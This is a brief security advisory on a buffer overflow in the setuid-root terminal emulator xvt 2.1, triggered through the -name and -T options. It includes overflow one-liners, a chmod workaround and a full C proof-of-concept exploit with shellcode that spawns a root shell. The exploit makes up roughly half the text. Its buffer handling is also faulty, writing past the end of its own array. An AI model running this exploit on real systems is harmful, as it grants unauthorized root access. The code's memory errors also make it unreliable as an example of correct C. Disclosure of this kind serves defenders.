|
|
|
|
| |
| Xvt is an X terminal-emulator that is designed to be more or less compatible with xterm while using much less swap space. It is mainly intended for use at sites that use large numbers of X terminals but may also be useful on single workstations that are short of memory. The main way that xvt achieves its small size is by avoiding the use of the X toolkit. A security vulnerability in the product allows an attacker to overflow one of the program's internal buffers causing it to execute arbitrary code. |
| |
Credit:
The information has been provided by BAILLEUX Christophe.
|
| |
Vulnerable systems:
Xvt version 2.1
Xvt contains a buffer overrun condition related to passing a large arguments to xvt's -T and -name command-line options. Since xvt is installed setuid root by default, it is possible for a normal user to pass a carefully crafted argument to xvt such that xvt executes a root shell.
Examples:
$ xvt -name `perl -e 'print "A"x234'`
$ xvt -T `perl -e 'print "A"x262'`
Workaround:
As a temporary measure, remove the setuid root from the program:
# chmod u-s /usr/bin/X11/xvt
Exploit:
/*
/usr/bin/X11/xvt overflow proof of concept by cb@t-online.fr.
tshaw:~$ ./expl
bash#
*/
#include <stdio.h>
#include <stdlib.h>
int main()
{
char buf[234];
int i;
char code[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
for(i=0; i<76; i++)
buf[i] = 0x41;
*(long *)&buf[76]=0xbffffab0; /* ret addr */
memset(buf + 80, 0x90, 234);
memcpy(buf + 233 - strlen(code), code, strlen(code));
buf[234] = '\0';
execl("/usr/bin/X11/xvt", "xvt", "-name", buf, 0);
}
|
|
|
|
|
